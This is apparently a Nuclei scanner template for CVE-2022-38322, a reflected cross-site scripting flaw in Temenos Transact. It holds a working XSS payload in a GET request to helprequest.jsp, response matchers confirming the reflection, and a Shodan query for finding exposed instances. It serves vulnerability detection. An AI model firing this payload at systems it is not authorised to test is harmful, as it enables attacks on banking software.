37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
id: CVE-2022-38322
|
|
|
|
info:
|
|
name: Temenos Transact - Cross-Site Scripting
|
|
author: qotoz
|
|
severity: high
|
|
description: |
|
|
Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks.
|
|
reference:
|
|
- https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.title:"transact sign in","t24 sign in"
|
|
tags: cve,cve2022,temenos,transact,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- setupHelp('')" onerror="confirm('document.domain')
|
|
|
|
- type: word
|
|
part: content_type
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402206e0fdc6fcdacae40c482dddc8334c22e816c8c734fadd3874bcd0e0fe6ca8eff022011d920d8db43fcbb74db42290aa9b151c02956dd656a05d82430d1c2c923b3ae:922c64590222798bb761d5b6d8e72950 |